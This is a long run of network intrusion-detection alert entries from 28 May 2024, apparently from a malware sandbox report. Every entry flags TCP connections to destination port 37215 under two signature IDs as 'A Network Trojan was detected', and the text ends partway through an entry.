          SID:2835222
          Source Port:50752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.984996
          SID:2835222
          Source Port:37394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138063
          SID:2829579
          Source Port:44416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089594
          SID:2829579
          Source Port:60656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160321
          SID:2835222
          Source Port:60890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497808
          SID:2829579
          Source Port:39288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277648
          SID:2835222
          Source Port:34046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591458
          SID:2829579
          Source Port:39696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401574
          SID:2829579
          Source Port:50766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464107
          SID:2829579
          Source Port:35388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591354
          SID:2835222
          Source Port:60146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320997
          SID:2835222
          Source Port:34578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414254
          SID:2829579
          Source Port:58692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840293
          SID:2829579
          Source Port:60442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113093
          SID:2835222
          Source Port:52786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285969
          SID:2829579
          Source Port:45206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797129
          SID:2829579
          Source Port:55740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084268
          SID:2829579
          Source Port:52596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268575
          SID:2829579
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813596
          SID:2835222
          Source Port:38326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111591
          SID:2835222
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272359
          SID:2835222
          Source Port:54432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297541
          SID:2829579
          Source Port:36044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729068
          SID:2835222
          Source Port:47156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.997352
          SID:2829579
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265659
          SID:2829579
          Source Port:41638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977256
          SID:2835222
          Source Port:55338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923587
          SID:2835222
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663084
          SID:2829579
          Source Port:54998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426617
          SID:2829579
          Source Port:35036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933452
          SID:2835222
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219206
          SID:2829579
          Source Port:55388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592011
          SID:2829579
          Source Port:42844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711213
          SID:2829579
          Source Port:47514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164576
          SID:2835222
          Source Port:58152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848521
          SID:2835222
          Source Port:60286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486297
          SID:2829579
          Source Port:45192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846341
          SID:2829579
          Source Port:48168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922921
          SID:2835222
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592804
          SID:2829579
          Source Port:44288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215939
          SID:2835222
          Source Port:42176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293910
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941563
          SID:2829579
          Source Port:59962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963779
          SID:2829579
          Source Port:47028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176413
          SID:2835222
          Source Port:46330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.913785
          SID:2829579
          Source Port:57654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168458
          SID:2835222
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161091
          SID:2835222
          Source Port:42208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593114
          SID:2829579
          Source Port:35730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089612
          SID:2829579
          Source Port:35424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710123
          SID:2829579
          Source Port:33052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893282
          SID:2835222
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650248
          SID:2835222
          Source Port:34812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220946
          SID:2835222
          Source Port:49276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876935
          SID:2835222
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271683
          SID:2829579
          Source Port:36712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891643
          SID:2829579
          Source Port:46344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868753
          SID:2829579
          Source Port:44822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405407
          SID:2835222
          Source Port:37184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626413
          SID:2835222
          Source Port:37070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223938
          SID:2835222
          Source Port:42998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141834
          SID:2835222
          Source Port:54728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889916
          SID:2829579
          Source Port:53764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338588
          SID:2829579
          Source Port:42276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203793
          SID:2829579
          Source Port:49654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321050
          SID:2835222
          Source Port:49904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201387
          SID:2835222
          Source Port:59676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175500
          SID:2835222
          Source Port:47954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178965
          SID:2829579
          Source Port:44246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878023
          SID:2829579
          Source Port:50392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857746
          SID:2829579
          Source Port:41546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.443253
          SID:2829579
          Source Port:35692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021454
          SID:2835222
          Source Port:40308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.311690
          SID:2835222
          Source Port:56150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664568
          SID:2829579
          Source Port:43956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819336
          SID:2829579
          Source Port:52436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266590
          SID:2829579
          Source Port:50142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848372
          SID:2835222
          Source Port:36778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953944
          SID:2835222
          Source Port:52456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547755
          SID:2829579
          Source Port:55112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892845
          SID:2829579
          Source Port:44514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270807
          SID:2829579
          Source Port:54724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845144
          SID:2835222
          Source Port:48342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755605
          SID:2835222
          Source Port:44486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067282
          SID:2835222
          Source Port:60578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733035
          SID:2829579
          Source Port:46704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665072
          SID:2829579
          Source Port:45578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923181
          SID:2829579
          Source Port:57510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595013
          SID:2829579
          Source Port:49420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322341
          SID:2829579
          Source Port:60846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806876
          SID:2829579
          Source Port:47186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293133
          SID:2829579
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.130533
          SID:2829579
          Source Port:44768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189081
          SID:2835222
          Source Port:49912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710499
          SID:2829579
          Source Port:39582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551225
          SID:2829579
          Source Port:33446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269645
          SID:2829579
          Source Port:51090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300010
          SID:2835222
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466616
          SID:2835222
          Source Port:37378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470731
          SID:2829579
          Source Port:35720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819403
          SID:2835222
          Source Port:57602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708351
          SID:2835222
          Source Port:53266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861183
          SID:2835222
          Source Port:48794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652355
          SID:2835222
          Source Port:57306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756777
          SID:2835222
          Source Port:35102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211411
          SID:2835222
          Source Port:43900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175751
          SID:2835222
          Source Port:50076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845701
          SID:2835222
          Source Port:60914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.890752
          SID:2835222
          Source Port:42726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116672
          SID:2835222
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465253
          SID:2835222
          Source Port:41220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249369
          SID:2835222
          Source Port:57008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.295014
          SID:2835222
          Source Port:52874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557626
          SID:2829579
          Source Port:46582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868754
          SID:2835222
          Source Port:52764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739953
          SID:2829579
          Source Port:34684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542084
          SID:2829579
          Source Port:54652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201529
          SID:2829579
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084777
          SID:2835222
          Source Port:53742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859163
          SID:2835222
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298306
          SID:2835222
          Source Port:40214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796352
          SID:2829579
          Source Port:33092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291612
          SID:2835222
          Source Port:49572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.707252
          SID:2829579
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245206
          SID:2835222
          Source Port:40678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.112922
          SID:2829579
          Source Port:49050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623151
          SID:2829579
          Source Port:59098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.952049
          SID:2835222
          Source Port:38500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.094003
          SID:2829579
          Source Port:60640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215278
          SID:2835222
          Source Port:33268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180545
          SID:2835222
          Source Port:41462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483553
          SID:2835222
          Source Port:45522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501423
          SID:2835222
          Source Port:46576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949152
          SID:2829579
          Source Port:33890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196325
          SID:2835222
          Source Port:35264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992158
          SID:2829579
          Source Port:51990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813346
          SID:2829579
          Source Port:48142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157540
          SID:2835222
          Source Port:47236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.198030
          SID:2829579
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797388
          SID:2829579
          Source Port:56154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466368
          SID:2829579
          Source Port:35300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266483
          SID:2829579
          Source Port:46468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594966
          SID:2835222
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975307
          SID:2835222
          Source Port:52488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325836
          SID:2835222
          Source Port:58874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102788
          SID:2829579
          Source Port:54192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815776
          SID:2835222
          Source Port:36334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543592
          SID:2835222
          Source Port:48024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.990407
          SID:2835222
          Source Port:45948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352493
          SID:2835222
          Source Port:48098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241625
          SID:2835222
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267938
          SID:2829579
          Source Port:40036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175957
          SID:2829579
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796192
          SID:2829579
          Source Port:39128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.079501
          SID:2835222
          Source Port:36134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868082
          SID:2835222
          Source Port:49246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156870
          SID:2829579
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743571
          SID:2835222
          Source Port:32910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603823
          SID:2829579
          Source Port:51016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630878
          SID:2835222
          Source Port:48038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.103112
          SID:2829579
          Source Port:43134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296914
          SID:2835222
          Source Port:60004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399202
          SID:2835222
          Source Port:42562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543469
          SID:2829579
          Source Port:34416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595119
          SID:2835222
          Source Port:37474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848530
          SID:2829579
          Source Port:51752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988641
          SID:2829579
          Source Port:56462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666565
          SID:2835222
          Source Port:36902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226165
          SID:2835222
          Source Port:47958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988649
          SID:2835222
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152117
          SID:2835222
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667808
          SID:2835222
          Source Port:34918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293087
          SID:2829579
          Source Port:55258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735772
          SID:2835222
          Source Port:52076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963939
          SID:2835222
          Source Port:36712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272001
          SID:2835222
          Source Port:39148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878579
          SID:2829579
          Source Port:34242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941701
          SID:2835222
          Source Port:41022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680341
          SID:2829579
          Source Port:44376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907757
          SID:2829579
          Source Port:41308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498921
          SID:2829579
          Source Port:57020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064398
          SID:2829579
          Source Port:59610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202847
          SID:2829579
          Source Port:33112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717998
          SID:2835222
          Source Port:44304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594092
          SID:2829579
          Source Port:39262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724116
          SID:2829579
          Source Port:41528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651273
          SID:2835222
          Source Port:47286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866799
          SID:2835222
          Source Port:54034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804990
          SID:2829579
          Source Port:57220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325679
          SID:2829579
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760607
          SID:2829579
          Source Port:32950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483053
          SID:2835222
          Source Port:35376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.794629
          SID:2829579
          Source Port:42482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993727
          SID:2835222
          Source Port:39232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285194
          SID:2829579
          Source Port:43618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543551
          SID:2835222
          Source Port:39862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095752
          SID:2829579
          Source Port:40740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203079
          SID:2835222
          Source Port:36354
          Destination Port:37215
